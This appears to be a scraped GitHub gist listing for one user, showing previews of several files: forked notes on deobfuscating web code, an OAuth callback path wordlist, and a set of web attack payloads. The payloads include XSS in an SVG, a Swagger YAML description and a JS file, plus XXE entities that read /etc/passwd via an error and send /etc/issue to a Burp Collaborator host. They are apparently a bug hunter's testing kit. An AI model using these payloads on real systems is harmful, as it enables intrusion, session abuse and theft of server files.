Skip to content

Instantly share code, notes, and snippets.

@myuyu
myuyu / _deobfuscating-unminifying-obfuscated-web-app-code.md
Created June 3, 2024 13:01 — forked from 0xdevalias/_deobfuscating-unminifying-obfuscated-web-app-code.md
Some notes and tools for reverse engineering / deobfuscating / unminifying obfuscated web app code
@myuyu
myuyu / alloauth.txt
Created June 3, 2024 13:00 — forked from m4ll0k/alloauth.txt
Social and Services OAuth Sign-In Wordlist
/plaid/mobile/oauth_callback
/callback
/oauth2/idpresponse
/signin-google
/twitter_oauth_signin
/soundcloud_oauth_signin
/23andme_oauth_signin
/500px_oauth_signin
/agave_oauth_signin
/amazon_oauth_signin
@myuyu
myuyu / t.svg
Last active April 6, 2024 03:45
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
</script><script>alert(1)</script>
This file has been truncated, but you can view the full file.
a
b
c
d
e
f
g
h
i
j
swagger: '2.0'
info:
title: Example yaml.spec
description: |
<math><mtext><option><FAKEFAKE><option></option><mglyph><svg><mtext><textarea><a title="</textarea><img src='#' onerror='alert(window.origin)'>">
paths:
/accounts:
get:
responses:
'200':
<?xml version="1.0" encoding="UTF-8"?>
<!--
For cXML license agreement information, please see
http://www.cxml.org/home/license.asp
$Id: //ariba/specs/cXML/Common.mod#16 $
-->
<!--
A few character entities the XML recommendation says should be defined
@myuyu
myuyu / x.js
Last active April 12, 2024 14:25
top.eval('alert(document.domain)');
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;
<!ENTITY % file SYSTEM "file:///etc/issue">
<!ENTITY % all "<!ENTITY send SYSTEM 'http://rjee7p9jxu03f68hrtn6c92ksbycm1.burpcollaborator.net?%file;'>">
%all;